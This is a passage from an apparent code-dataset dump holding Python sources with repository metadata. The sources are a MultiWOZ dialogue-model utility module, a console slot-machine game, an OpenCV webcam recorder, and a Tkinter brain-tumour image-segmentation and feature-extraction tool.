'-' + str(iter) + '.enc'))\n self.policy.load_state_dict(torch.load(self.pre_model_dir + '/' + self.model_name + '-' + str(iter) + '.pol'))\n self.decoder.load_state_dict(torch.load(self.pre_model_dir + '/' + self.model_name + '-' + str(iter) + '.dec'))\n\n def input_index2word(self, index):\n if index in self.input_lang_index2word:\n return self.input_lang_index2word[index]\n else:\n raise UserWarning('We are using UNK')\n\n def output_index2word(self, index):\n if index in self.output_lang_index2word:\n return self.output_lang_index2word[index]\n else:\n raise UserWarning('We are using UNK')\n\n def input_word2index(self, index):\n if index in self.input_lang_word2index:\n return self.input_lang_word2index[index]\n else:\n return 2\n\n def output_word2index(self, index):\n if index in self.output_lang_word2index:\n return self.output_lang_word2index[index]\n else:\n return 2\n\n # pp added:\n def input_intent2index(self, intent):\n if intent in self.intent2index:\n return self.intent2index[intent]\n else:\n return 0\n\n def input_index2intent(self, index):\n if index in self.index2intent:\n return self.index2intent[index]\n else:\n raise UserWarning('We are using UNK intent')\n\n def getCount(self):\n learnable_parameters = filter(lambda p: p.requires_grad, self.parameters())\n param_cnt = sum([reduce((lambda x, y: x * y), param.shape) for param in learnable_parameters])\n print('Model has', param_cnt, ' parameters.')\n\n def printGrad(self):\n learnable_parameters = filter(lambda p: p.requires_grad, self.parameters())\n for idx, param in enumerate(learnable_parameters):\n print(param.grad, param.shape)\n" }, { "alpha_fraction": 0.6205095648765564, "alphanum_fraction": 0.6328662633895874, "avg_line_length": 36.91787338256836, "blob_id": "dd173f07f68f8cfff843510e676ba170af129bfc", "content_id": "9055c7e9ac94f57ee03e42580fbdef8a7702f78c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7850, "license_type": "no_license", "max_line_length": 145, "num_lines": 207, "path": "/utils/util.py", "repo_name": 
"Jiahuan-Pei/multiwoz-mdrg", "src_encoding": "UTF-8", "text": "'''\nUtility functions\n'''\n\nimport argparse\nimport pickle as pkl\nimport json\nimport sys\nimport math\nimport time\nimport numpy as np\nimport torch\nimport random\nimport os\nimport shutil\n\n# DEFINE special tokens\nSOS_token = 0\nEOS_token = 1\nUNK_token = 2\nPAD_token = 3\n# detected_device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\ndetected_device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\ndefault_device = torch.device(\"cpu\")\n\ndef padSequence(tensor, device=default_device):\n pad_token = PAD_token\n tensor_lengths = [len(sentence) for sentence in tensor]\n longest_sent = max(tensor_lengths)\n batch_size = len(tensor)\n padded_tensor = torch.ones((batch_size, longest_sent), dtype=torch.int64, device=device) * pad_token\n\n # copy over the actual sequences\n for i, x_len in enumerate(tensor_lengths):\n sequence = tensor[i]\n padded_tensor[i, 0:x_len] = sequence[:x_len]\n\n padded_tensor = torch.as_tensor(padded_tensor, dtype=torch.long, device=device)\n # padded_tensor = torch.LongTensor(padded_tensor)\n return padded_tensor, tensor_lengths\n\n\ndef loadDialogue(model, val_file, input_tensor, target_tensor, bs_tensor, db_tensor, mask_tensor=None, intent2index=None, device=default_device):\n # Iterate over dialogue\n for idx, (usr, sys, bs, db, acts) in enumerate(\n zip(val_file['usr'], val_file['sys'], val_file['bs'], val_file['db'], val_file['acts'])):\n tensor = [model.input_word2index(word) for word in usr.strip(' ').split(' ')] + [EOS_token] # models.input_word2index(word)\n input_tensor.append(torch.as_tensor(tensor, dtype=torch.long, device=device)) # .view(-1, 1))\n # input_tensor.append(torch.LongTensor(tensor)) # .view(-1, 1))\n\n tensor = [model.output_word2index(word) for word in sys.strip(' ').split(' ')] + [EOS_token]\n target_tensor.append(torch.as_tensor(tensor, dtype=torch.long, device=device)) # .view(-1, 1)\n # target_tensor.append(torch.LongTensor(tensor)) # .view(-1, 1)\n\n bs_tensor.append([float(belief) for belief in bs])\n db_tensor.append([float(pointer) for pointer in db])\n\n # pp added: mask_i=0 if i_th it contains i_th intent\n if intent2index:\n tensor = torch.ones(len(intent2index), 1)\n # change acts & find index\n intent_type = model.args.intent_type\n if intent_type == 'domain':\n inds = [model.input_intent2index(act.split('-')[0]) for act in acts]\n elif intent_type == 'sysact':\n inds = [model.input_intent2index(act.split('-')[1]) for act in acts]\n elif intent_type == 'domain_act':\n inds = [model.input_intent2index(act) for act in acts] # the index of the chosen intents\n tensor[:][inds] = 0\n mask_tensor.append(torch.as_tensor(tensor, dtype=torch.uint8, device=device))\n\n return input_tensor, target_tensor, bs_tensor, db_tensor, mask_tensor # mask_tensor is a list of [Intent, 1]\n\n\n#json loads strings as unicode; we currently still work with Python 2 strings, and need conversion\ndef unicode_to_utf8(d):\n return dict((key.encode(\"UTF-8\"), value) for (key,value) in d.items())\n\n\ndef load_dict(filename):\n try:\n with open(filename, 'rb') as f:\n return unicode_to_utf8(json.load(f))\n except:\n with open(filename, 'rb') as f:\n return pkl.load(f)\n\n\ndef load_config(basename):\n try:\n with open('%s.json' % basename, 'rb') as f:\n return json.load(f)\n except:\n try:\n with open('%s.pkl' % basename, 'rb') as f:\n return pkl.load(f)\n except:\n sys.stderr.write('Error: config file {0}.json is missing\\n'.format(basename))\n 
sys.exit(1)\n\n\ndef str2bool(v):\n if v.lower() in ('yes', 'true', 't', 'y', '1'):\n return True\n elif v.lower() in ('no', 'false', 'f', 'n', '0'):\n return False\n else:\n raise argparse.ArgumentTypeError('Boolean value expected.')\n\n\ndef asMinutes(s):\n m = math.floor(s / 60)\n s -= m * 60\n return '%dm %ds' % (m, s)\n\n\ndef timeSince(since, percent):\n now = time.time()\n s = now - since\n return '%s ' % (asMinutes(s))\n\n\n# pp added -- Start\ndef get_env_info():\n import sys\n print('Python version={}'.format(sys.version))\n print('PyTorch version={}'.format(torch.__version__))\n\n flag = torch.cuda.is_available()\n print('torch.cuda.is_available()={}'.format(flag))\n if flag:\n from torch.backends import cudnn\n cudnn.enabled = True\n cudnn.benchmark = False # False efficiency decrease; but fix random;\n cudnn.deterministic = True # if True, the result would keep same; if False, efficiency would be high but results would change slightly\n # os.environ[\"CUDA_VISIBLE_DEVICES\"] = '1' # choose which device to use\n # torch.set_default_tensor_type(torch.cuda.FloatTensor if torch.cuda.is_available() else torch.FloatTensor) # be careful if use\n print('torch.cuda.current_device()={}'.format(torch.cuda.current_device()))\n print('torch.cuda.device_count()={}'.format(torch.cuda.device_count()))\n print('torch.cuda.get_device_name(0)={}'.format(torch.cuda.get_device_name(0)))\n print('torch.backends.cudnn.version()={}'.format(cudnn.version()))\n print('torch.version.cuda={}'.format(torch.version.cuda))\n print('Memory Usage:')\n print('Allocated:', round(torch.cuda.memory_allocated(0)/1024**3,1), 'GB')\n print('Cached: ', round(torch.cuda.memory_cached(0)/1024**3,1), 'GB')\n\n\ndef get_ms():\n return time.time() * 1000\n\ndef init_seed(seed=None):\n if seed is None:\n seed = int(get_ms() // 1000)\n np.random.seed(seed)\n torch.manual_seed(seed)\n random.seed(seed)\n\ndef loadDictionaries(mdir):\n # load data and dictionaries\n with open('{}/input_lang.index2word.json'.format(mdir)) as f:\n input_lang_index2word = json.load(f)\n with open('{}/input_lang.word2index.json'.format(mdir)) as f:\n input_lang_word2index = json.load(f)\n with open('{}/output_lang.index2word.json'.format(mdir)) as f:\n output_lang_index2word = json.load(f)\n with open('{}/output_lang.word2index.json'.format(mdir)) as f:\n output_lang_word2index = json.load(f)\n\n\n return input_lang_index2word, output_lang_index2word, input_lang_word2index, output_lang_word2index\n\n# pp added: give a intent_type, return a list of intent names\ndef loadIntentDictionaries(intent_type='domain', intent_file='../data/intents.json'):\n fin = open(intent_file, 'r')\n intents = json.load(fin) # index 0 is UNK-UNK\n intent_list = []\n if intent_type == 'domain':\n intent_list = [intents[0].split('-')[0]] + sorted(list(set([s.split('-')[0] for s in intents[1:]])))\n elif intent_type == 'sysact':\n intent_list = [intents[0].split('-')[1]] + sorted(list(set([s.split('-')[1] for s in intents[1:]])))\n elif intent_type == 'domain_act':\n intent_list = intents\n if intent_list:\n print('intent_list=', intent_list)\n intent2index = {intent:index for index, intent in enumerate(intent_list)} # the first intent should be 'UNK-UNK'\n index2intent = dict(zip(intent2index.values(), intent2index.keys()))\n return intent2index, index2intent\n else:\n return None, None\n\n# TODO: initialise paras of a models in the same way\ndef init_params(model):\n from torch.nn.init import xavier_uniform_\n for name, param in model.named_parameters():\n print(name, 
param.size())\n if param.data.dim() > 1:\n xavier_uniform_(param.data)\n\n# creat a new dir if it do not exist\ndef pp_mkdir(path):\n if os.path.exists(path):\n shutil.rmtree(path)\n os.makedirs(path)\n else:\n os.makedirs(path)\n\n# pp added -- End\n\n" } ]
10
ethonwilles/casino
https://github.com/ethonwilles/casino
c64133d266b3d7f6fee0eaa6109f60377e7b9bec
d33be8f266f49042b942a0b67702c35ef24b35c1
023205019facbf3fd67a615556dd7bf271cfa160
refs/heads/master
2020-07-30T09:07:42.156506
2019-09-26T16:06:20
2019-09-26T16:06:20
210,167,024
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5347885489463806, "alphanum_fraction": 0.5628921985626221, "avg_line_length": 44.82500076293945, "blob_id": "e851ca0955c549936b523146ad0d92bbcf10c963", "content_id": "05495612cdd47933e385b016813d20584d6b229f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3665, "license_type": "no_license", "max_line_length": 182, "num_lines": 80, "path": "/casino.py", "repo_name": "ethonwilles/casino", "src_encoding": "UTF-8", "text": "import random\nslots = [1,2,3,4,5,6,7]\n\n\ndef initial_welcome(money):\n try: \n if type(int(money)) == int and int(money) <= 50:\n print('Welcome to the Casino!')\n print(' We will begin to play slots!')\n print(\"\"\"\n Rules:\n * It costs $3.00 to play.\n * If your wallet hits zero, the game ends.\n * If your wallet does not have enough to continue the game, the game ends\n * Max Amount of Money that can be entered is $50\n \"\"\")\n \n game(money,input('Enter Yes to play, Enter No to quit.: '))\n elif int(money) >= 1000000:\n print('\\n Come on you definitely dont have more than $1,000,000.')\n initial_welcome(input('Try again. Remember, no more than $50: '))\n else:\n print('Too much money.')\n initial_welcome(input('Try again. Remember, no more than $50: '))\n\n except:\n try:\n if type(money) == str:\n print('Thanks for playing!')\n except:\n initial_welcome(input('Invalid Response. Needs to be an integer. Try Again: '))\n\ndef game(money,choice):\n if (choice.lower()) == 'yes':\n player_wallet = int(money)\n print(f'You are starting out with ${player_wallet}.00')\n player_wallet -= 3\n print(f'\\n The game cost $3.00 so now your wallet is down to ${player_wallet}.00')\n slot_nums = []\n for i in range(0,3):\n rannum = random.randint(1,len(slots))\n slot_nums.append(rannum)\n if player_wallet < 3 or player_wallet - 1 < 3:\n print(f'Sadly your wallet is at ${player_wallet}.00')\n initial_welcome(input(\"You don't have enough money to continue! How much more money would you like to add? Or enter no to stop playing.: \"))\n elif slot_nums[0] == 7 and slot_nums[1] == 7 and slot_nums[2] == 7:\n print('Three sevens!! Jackpot! 1000 dollars added to wallet.')\n player_wallet = player_wallet + 1000\n print(f'\\n Your total wallet amount is ${player_wallet}.00')\n game(player_wallet, input('Great job! Play Again??: '))\n elif slot_nums[0] == slot_nums[1] and slot_nums[1] == slot_nums[2] and slot_nums[2] == slot_nums[0]:\n print('Three of the same numbers rolled!! 5 dollars added to wallet.')\n player_wallet = player_wallet + 5\n print(f'\\n Your total wallet amount is ${player_wallet}.00')\n game(player_wallet, input('Great job! Play Again??: '))\n elif slot_nums[0] == slot_nums[1] - 1 and slot_nums[0] == slot_nums[2] - 2:\n print('You won!! 4 dollars added to wallet.')\n player_wallet = player_wallet + 4\n print(f'\\n Your total wallet amount is ${player_wallet}.00')\n game(player_wallet, input('Great job! Play Again??: '))\n elif slot_nums[0] == 7 or slot_nums[1] == 7 or slot_nums[2] == 7:\n print('One of your rolled numbers was 7!! You get $1.00!!')\n player_wallet += 1\n print(f'\\n Your total wallet amount is ${player_wallet}.00')\n game(player_wallet, input('Great job! Play Again??: '))\n \n \n else:\n print(f'\\n Your total wallet amount is ${player_wallet}.00')\n game(player_wallet,input('No winnings :/ Play Again?? **Enter yes or no**: '))\n \n else:\n print('Thanks for Playing!')\n\n\n\n\n\n\ninitial_welcome(input('How much money would you like to add? 
WARNING** Only a max of $50 can be entered at a time. Thinking you have anything above $50 is just wishful thinking.: '))" } ]
1
MatheusCiSoares/opencv-python
https://github.com/MatheusCiSoares/opencv-python
804d641eb4793e13540394ca9b6fe80699e9747d
d7f80c10f071b6694086355fa2120fdcfa486758
5358e1b7bc93737d2c5d8d0da56cdc51a1e590ff
refs/heads/master
2020-12-19T20:42:49.876440
2020-01-23T17:16:59
2020-01-23T17:16:59
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6275132298469543, "alphanum_fraction": 0.6698412895202637, "avg_line_length": 26.794116973876953, "blob_id": "d90742a2531cf9da50bb122e8b4ed4fc4831e422", "content_id": "d3fc6ccaf6d42e4f2c219dbe5bbf63602da55651", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 948, "license_type": "no_license", "max_line_length": 76, "num_lines": 34, "path": "/start-opencv-video.py", "repo_name": "MatheusCiSoares/opencv-python", "src_encoding": "UTF-8", "text": "import cv2\nimport numpy\n\n#camera ou arquivo \".... .mp4\"\n#0-1-2, o 0 é a câmera default\n\n# print(camera.isOpened()) (MOSTRAR SE CONSEGUIU SE CONECTAR COM A CÂMERA!)\ncamera = cv2.VideoCapture(0)\ncamera.set(3,1280) #3=largura\ncamera.set(4,720) #4=altura\n#devemos definir o tamanho da camera, na sua resolucao, para podermos gravar\n#tamanhos diferentes da camera vai ocorrer erro na gravacao!\n\nfourcc = cv2.VideoWriter_fourcc(*'XVID')\nout = cv2.VideoWriter('Videos/nomeArquivo.avi',fourcc,30,(1280,720))\n\nwhile(camera.isOpened()):\n ret,frame = camera.read()\n if ret == True:\n # print(camera.get(cv2.CAP_PROP_FRAME_WIDTH))\n # print(camera.get(cv2.CAP_PROP_FRAME_HEIGHT))\n\n out.write(frame)\n\n gray = cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)\n cv2.imshow('frame',gray)\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n else:\n break\ncamera.release()\nout.release()\ncv2.destroyAllWindows()\n" } ]
1
Ritz5940/brain_tumor_detection
https://github.com/Ritz5940/brain_tumor_detection
938ae0118c6af02930803a0ebb39bedc9bfef802
e96c4c079b90e721226f0a83cb4732ef750de10c
b2ac43a9cb0aa0609d221f053105a73ca50f8f14
refs/heads/master
2022-12-17T00:38:16.080928
2020-09-22T16:59:43
2020-09-22T16:59:43
297,706,643
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5187870860099792, "alphanum_fraction": 0.555372416973114, "avg_line_length": 41.342857360839844, "blob_id": "ca02e428cdf141eddf4b8024012d6fc566c335bf", "content_id": "d4aeb8a85e1675276b0a6058e2db9aefeb58665a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3034, "license_type": "no_license", "max_line_length": 91, "num_lines": 70, "path": "/traindata.py", "repo_name": "Ritz5940/brain_tumor_detection", "src_encoding": "UTF-8", "text": "import xlwt \r\nfrom xlwt import Workbook\r\nimport os\r\nimport pandas as pd\r\n\r\ndef Train_data():\r\n datadir = \"H:\\RITESH\\Python\\ML\\Phase3\\Brain Toumer\"\r\n Categories = [\"no\",\"yes\"]\r\n j=0\r\n wb = Workbook()\r\n sheet1 = wb.add_sheet('Sheet 1')\r\n for category in Categories:\r\n path = os.path.join(datadir,category)\r\n #print(len(os.listdir(path))\r\n for img in os.listdir(path): \r\n #name= filedialog.askopenfilename() \r\n img = cv2.imread(os.path.join(path,img))\r\n img1=img\r\n im_out=np.zeros(img.shape[:2], dtype=\"uint8\") * 255\r\n mask = np.zeros(img.shape[:2], dtype=\"uint8\") * 255\r\n img_gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n height, width= img_gray.shape\r\n ret,im_th= cv2.threshold(img_gray,180,255,cv2.THRESH_BINARY)\r\n #cv2.imshow('image Throshold', im_th)\r\n denoised=cv2.medianBlur(im_th,9)\r\n #cv2.imshow('image Denoised', denoised)\r\n edges = cv2.Canny(denoised,100,200)\r\n #cv2.imshow('Edges',edges)\r\n # noise removal\r\n kernel = np.ones((3,3),np.uint8)\r\n opening = cv2.morphologyEx(denoised,cv2.MORPH_OPEN,kernel, iterations = 2)\r\n\r\n # sure background area\r\n sure_bg = cv2.dilate(opening,kernel,iterations=3)\r\n\r\n # Finding sure foreground area\r\n dist_transform = cv2.distanceTransform(opening,cv2.DIST_L2,5)\r\n ret, sure_fg = cv2.threshold(dist_transform,0.7*dist_transform.max(),255,0)\r\n\r\n # Finding unknown region\r\n sure_fg = np.uint8(sure_fg)\r\n unknown = cv2.subtract(sure_bg,sure_fg)\r\n # Marker labelling\r\n ret, markers = cv2.connectedComponents(sure_fg)\r\n\r\n # Add one to all labels so that sure background is not 0, but 1\r\n markers = markers+1\r\n\r\n # Now, mark the region of unknown with zero\r\n markers[unknown==255] = 0\r\n markers = cv2.watershed(img,markers)\r\n img[markers == 1] = [255,255,255]\r\n img1[markers == 1] = [0]\r\n im_th=cv2.cvtColor(img1, cv2.COLOR_BGR2GRAY)\r\n #cv2.imshow('image marker',img)\r\n img1 = cv2.bitwise_and(img, img, mask=mask)\r\n g = skimage.feature.greycomatrix(im_th, [1], [0], levels=256, symmetric=False, \r\n normed=True)\r\n contrast = skimage.feature.greycoprops(g, 'contrast')[0][0]\r\n energy = skimage.feature.greycoprops(g, 'energy')[0][0]\r\n homogeneity = skimage.feature.greycoprops(g, 'homogeneity')[0][0]\r\n correlation = skimage.feature.greycoprops(g, 'correlation')[0][0]\r\n sheet1.write(j, 0, contrast) \r\n sheet1.write(j, 1, energy) \r\n sheet1.write(j, 2, homogeneity) \r\n sheet1.write(j, 3, correlation)\r\n print(j)\r\n j=j+1\r\n wb.save('xlwt example.xls')\r\n #print(pandas.read_excel('xlwt example.xls'))\r\n" }, { "alpha_fraction": 0.5783284902572632, "alphanum_fraction": 0.6277443170547485, "avg_line_length": 44.64930725097656, "blob_id": "b81462cc88a4e4ca81059d389766c2ef0ff2d250", "content_id": "23e35102f30ee8d596b81c1d3380f61c42f39c50", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 13437, "license_type": "no_license", "max_line_length": 171, "num_lines": 288, "path": "/train and 
extarction.py", "repo_name": "Ritz5940/brain_tumor_detection", "src_encoding": "UTF-8", "text": "from tkinter import *\r\nimport tkinter\r\nimport tkinter as tk\r\nfrom tkinter import filedialog\r\nfrom tkinter.ttk import Progressbar \r\nimport cv2\r\nimport PIL.Image, PIL.ImageTk\r\nimport numpy as np;\r\nimport copy\r\nfrom skimage import data\r\nfrom skimage.feature import greycomatrix, greycoprops\r\nimport skimage.io\r\nimport skimage.feature\r\nimport xlwt \r\nfrom xlwt import Workbook\r\nimport os\r\nimport pandas as pd\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.neural_network import MLPClassifier\r\nimport time \r\n# Create a window\r\nwindow =Tk()\r\nwindow.title(\"BRAIN TUMOR DETECTION USING MACHINE LEARNING\")\r\nwindow.geometry(\"1366x768\")\r\nmessage = tk.Label(window, text=\"BRAIN TUMOR DETECTION USING MACHINE LEARNING\" ,bg=\"Green\" ,fg=\"white\" ,width=50 ,height=3,font=('times', 20, 'italic bold underline')) \r\n\r\nmessage.place(x=270, y=20)\r\ndef answer():\r\n global cv_img, mask,img,canvas1,canvas4,canvas2,canvas3\r\n canvas1.delete(\"all\")\r\n canvas2.delete(\"all\")\r\n canvas3.delete(\"all\")\r\n canvas4.delete(\"all\")\r\n #showerror(\"Answer\", \"Sorry, no answer available\")\r\n name= filedialog.askopenfilename() \r\n cv_img = cv2.imread(name)\r\n newsize = (180, 218) \r\n cv_img = cv2.resize(cv_img,newsize) \r\n img=cv_img\r\n \r\n mask = np.zeros(cv_img.shape[:2], dtype=\"uint8\") * 255\r\n # Get the image dimensions (OpenCV stores image data as NumPy ndarray)\r\n height, width, no_channels = cv_img.shape\r\n\r\n lbl = tk.Label(window, text=\"Original Image\",width=20 ,height=2 ,fg=\"black\",font=('times', 10, ' bold ') ) \r\n lbl.place(x=70, y=160)\r\n # Create a canvas that can fit the above image\r\n canvas1 = tkinter.Canvas(window, width = width, height = height)\r\n canvas1.place(x=50,y=200)\r\n \r\n # Use PIL (Pillow) to convert the NumPy ndarray to a PhotoImage\r\n photo = PIL.ImageTk.PhotoImage(image = PIL.Image.fromarray(cv_img))\r\n \r\n # Add a PhotoImage to the Canvas\r\n canvas1.create_image(0, 0, image=photo, anchor=tkinter.NW)\r\n \r\n # Run the window loop\r\n window.mainloop()\r\ndef rgb2gray():\r\n global cv_img,img_gray,canvas1,canvas2\r\n img_gray = cv2.cvtColor(cv_img, cv2.COLOR_BGR2GRAY)\r\n height, width= img_gray.shape\r\n #canvas1.delete(\"all\")\r\n lbl = tk.Label(window, text=\"Gray Image\",width=20 ,height=2 ,fg=\"black\",font=('times', 10, ' bold ') ) \r\n lbl.place(x=270, y=160)\r\n # Create a canvas that can fit the above image\r\n canvas2 = tkinter.Canvas(window, width = width, height = height)\r\n canvas2.place(x=250,y=200)\r\n \r\n # Use PIL (Pillow) to convert the NumPy ndarray to a PhotoImage\r\n photo = PIL.ImageTk.PhotoImage(image = PIL.Image.fromarray(img_gray))\r\n \r\n # Add a PhotoImage to the Canvas\r\n canvas2.create_image(0, 0, image=photo, anchor=tkinter.NW)\r\n window.mainloop()\r\ndef Thresholding():\r\n global cv_img,img_gray,im_th,canvas2,canvas3\r\n #canvas2.delete(\"all\")\r\n for threshold in range(150,180):\r\n ret,im_th= cv2.threshold(img_gray,threshold,255,cv2.THRESH_BINARY)\r\n height, width= im_th.shape\r\n lbl = tk.Label(window, text=\"Threshold Image\",width=20 ,height=2 ,fg=\"black\",font=('times', 10, ' bold ') ) \r\n lbl.place(x=470, y=160)\r\n # Create a canvas that can fit the above image\r\n canvas3 = tkinter.Canvas(window, width = width, height = height)\r\n canvas3.place(x=450,y=200)\r\n \r\n # Use PIL (Pillow) to convert the NumPy ndarray to a PhotoImage\r\n 
photo = PIL.ImageTk.PhotoImage(image = PIL.Image.fromarray(im_th))\r\n \r\n # Add a PhotoImage to the Canvas\r\n canvas3.create_image(0, 0, image=photo, anchor=tkinter.NW)\r\n window.mainloop()\r\ndef detect():\r\n global im_th,mask,cv_img,img,clone_img,canvas3,canvas4\r\n #canvas3.delete(\"all\")\r\n clone_img = copy.copy(img)\r\n #cv2.imshow('median filter1',img)\r\n denoised=cv2.medianBlur(im_th,9)\r\n #cv2.imshow('median filter',denoised)\r\n edges = cv2.Canny(denoised,100,200)\r\n #cv2.imshow('median filter3',edges)\r\n kernel = np.ones((3,3),np.uint8)\r\n opening = cv2.morphologyEx(denoised,cv2.MORPH_OPEN,kernel, iterations = 2)\r\n sure_bg = cv2.dilate(opening,kernel,iterations=3)\r\n # Finding sure foreground area\r\n dist_transform = cv2.distanceTransform(opening,cv2.DIST_L2,5)\r\n ret, sure_fg = cv2.threshold(dist_transform,0.7*dist_transform.max(),255,0)\r\n\r\n # Finding unknown region\r\n sure_fg = np.uint8(sure_fg)\r\n unknown = cv2.subtract(sure_bg,sure_fg)\r\n # Marker labelling\r\n ret, markers = cv2.connectedComponents(sure_fg)\r\n # Add one to all labels so that sure background is not 0, but 1\r\n markers = markers+1\r\n # Now, mark the region of unknown with zero\r\n markers[unknown==255] = 0\r\n markers = cv2.watershed(cv_img,markers)\r\n cv_img[markers == -1] = [255,0,0]\r\n #markers[unknown==255] = 0\r\n markers1 = cv2.watershed(clone_img,markers)\r\n clone_img[markers1 == 1] = [0,0,0]\r\n height, width= mask.shape\r\n lbl = tk.Label(window, text=\"Tumor Detection Image\",width=20 ,height=2 ,fg=\"black\",font=('times', 10, ' bold ') ) \r\n lbl.place(x=660, y=160)\r\n # Create a canvas that can fit the above image\r\n canvas4 = tkinter.Canvas(window, width = width, height = height)\r\n canvas4.place(x=650,y=200)\r\n \r\n # Use PIL (Pillow) to convert the NumPy ndarray to a PhotoImage\r\n photo = PIL.ImageTk.PhotoImage(image = PIL.Image.fromarray(cv_img))\r\n \r\n # Add a PhotoImage to the Canvas\r\n canvas4.create_image(0, 0, image=photo, anchor=tkinter.NW)\r\n window.mainloop()\r\ndef Feature_extraction():\r\n global clone_img,contrast,energy,homogeneity,correlation\r\n im_th=cv2.cvtColor(clone_img, cv2.COLOR_BGR2GRAY)\r\n g = skimage.feature.greycomatrix(im_th, [1], [0], levels=256, symmetric=False, \r\n normed=True)\r\n contrast = skimage.feature.greycoprops(g, 'contrast')[0][0]\r\n energy = skimage.feature.greycoprops(g, 'energy')[0][0]\r\n homogeneity = skimage.feature.greycoprops(g, 'homogeneity')[0][0]\r\n correlation = skimage.feature.greycoprops(g, 'correlation')[0][0]\r\n lbl = tk.Label(window, text=\"CONTRAST:\",width=20 ,height=2 ,fg=\"red\" ,font=('times', 10, ' bold ') ) \r\n lbl.place(x=850, y=200)\r\n lbl = tk.Label(window, text=\"ENERGY:\",width=20 ,height=2 ,fg=\"red\" ,font=('times', 10, ' bold ') ) \r\n lbl.place(x=850, y=230)\r\n lbl = tk.Label(window, text=\"HOMOGENEITY:\",width=20 ,height=2 ,fg=\"red\" ,font=('times', 10, ' bold ') ) \r\n lbl.place(x=850, y=260)\r\n lbl = tk.Label(window, text=\"CORRELATION:\",width=20 ,height=2 ,fg=\"red\" ,font=('times', 10, ' bold ') ) \r\n lbl.place(x=850, y=290)\r\n lbl = tk.Label(window, text=\"FEATURE EXTRACTION\",width=20 ,height=2 ,fg=\"black\" ,font=('times', 15, ' bold ') ) \r\n lbl.place(x=900, y=150)\r\n message = tk.Label(window, text=contrast ,fg=\"red\" ,width=30 ,height=2, activebackground = \"yellow\" ,font=('times', 10, ' bold ')) \r\n message.place(x=1000, y=200)\r\n message = tk.Label(window, text=energy ,fg=\"red\" ,width=30 ,height=2, activebackground = \"yellow\" ,font=('times', 10, ' 
bold ')) \r\n message.place(x=1000, y=230)\r\n message = tk.Label(window, text=homogeneity ,fg=\"red\" ,width=30 ,height=2, activebackground = \"yellow\" ,font=('times', 10, ' bold ')) \r\n message.place(x=1000, y=260)\r\n message = tk.Label(window, text=correlation ,fg=\"red\" ,width=30 ,height=2, activebackground = \"yellow\" ,font=('times', 10, ' bold ')) \r\n message.place(x=1000, y=290)\r\n print(contrast)\r\n print(energy)\r\n print(homogeneity)\r\n print(correlation)\r\n window.mainloop()\r\ndef Train_data():\r\n datadir = \"F:\\\\2019-2020\\\\BE\\\\Register\\\\2.SGI Brain Tumor Detection Using Machine Learning\\\\Phase6\\\\Brain Toumer\"\r\n Categories = [\"no\",\"yes\"]\r\n j=0\r\n wb = Workbook()\r\n sheet1 = wb.add_sheet('Sheet 1')\r\n lbl = tk.Label(window, text=\"Training\",width=20 ,height=2 ,fg=\"red\" ,font=('times', 13, ' bold ') ) \r\n lbl.place(x=850, y=355)\r\n progress = Progressbar(window, orient = HORIZONTAL, \r\n length = 500, mode = 'determinate',maximum =253) \r\n for category in Categories:\r\n path = os.path.join(datadir,category)\r\n #print(len(os.listdir(path))\r\n for img in os.listdir(path): \r\n #name= filedialog.askopenfilename() \r\n img = cv2.imread(os.path.join(path,img))\r\n dim=(180,218)\r\n img = cv2.resize(img,dim)\r\n img1=img\r\n #print(img.shape[:2])\r\n im_out=np.zeros(img.shape[:2], dtype=\"uint8\") * 255\r\n mask = np.zeros(img.shape[:2], dtype=\"uint8\") * 255\r\n img_gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n height, width= img_gray.shape\r\n ret,im_th= cv2.threshold(img_gray,180,255,cv2.THRESH_BINARY)\r\n #cv2.imshow('image Throshold', im_th)\r\n denoised=cv2.medianBlur(im_th,9)\r\n #cv2.imshow('image Denoised', denoised)\r\n edges = cv2.Canny(denoised,100,200)\r\n #cv2.imshow('Edges',edges)\r\n # noise removal\r\n kernel = np.ones((3,3),np.uint8)\r\n opening = cv2.morphologyEx(denoised,cv2.MORPH_OPEN,kernel, iterations = 2)\r\n\r\n # sure background area\r\n sure_bg = cv2.dilate(opening,kernel,iterations=3)\r\n\r\n # Finding sure foreground area\r\n dist_transform = cv2.distanceTransform(opening,cv2.DIST_L2,5)\r\n ret, sure_fg = cv2.threshold(dist_transform,0.7*dist_transform.max(),255,0)\r\n\r\n # Finding unknown region\r\n sure_fg = np.uint8(sure_fg)\r\n unknown = cv2.subtract(sure_bg,sure_fg)\r\n # Marker labelling\r\n ret, markers = cv2.connectedComponents(sure_fg)\r\n\r\n # Add one to all labels so that sure background is not 0, but 1\r\n markers = markers+1\r\n\r\n # Now, mark the region of unknown with zero\r\n markers[unknown==255] = 0\r\n markers = cv2.watershed(img,markers)\r\n img[markers == 1] = [255,255,255]\r\n img1[markers == 1] = [0]\r\n im_th=cv2.cvtColor(img1, cv2.COLOR_BGR2GRAY)\r\n #cv2.imshow('image marker',img)\r\n img1 = cv2.bitwise_and(img, img, mask=mask)\r\n g = skimage.feature.greycomatrix(im_th, [1], [0], levels=256, symmetric=False, \r\n normed=True)\r\n contrast = skimage.feature.greycoprops(g, 'contrast')[0][0]\r\n energy = skimage.feature.greycoprops(g, 'energy')[0][0]\r\n homogeneity = skimage.feature.greycoprops(g, 'homogeneity')[0][0]\r\n correlation = skimage.feature.greycoprops(g, 'correlation')[0][0]\r\n sheet1.write(j, 0, contrast) \r\n sheet1.write(j, 1, energy) \r\n sheet1.write(j, 2, homogeneity) \r\n sheet1.write(j, 3, correlation)\r\n print(j)\r\n j=j+1\r\n wb.save('xlwt example.xls')\r\n\r\n \r\n progress['value'] = j\r\n window.update_idletasks() \r\n progress.place(x=850,y=400)\r\n lbl = tk.Label(window, 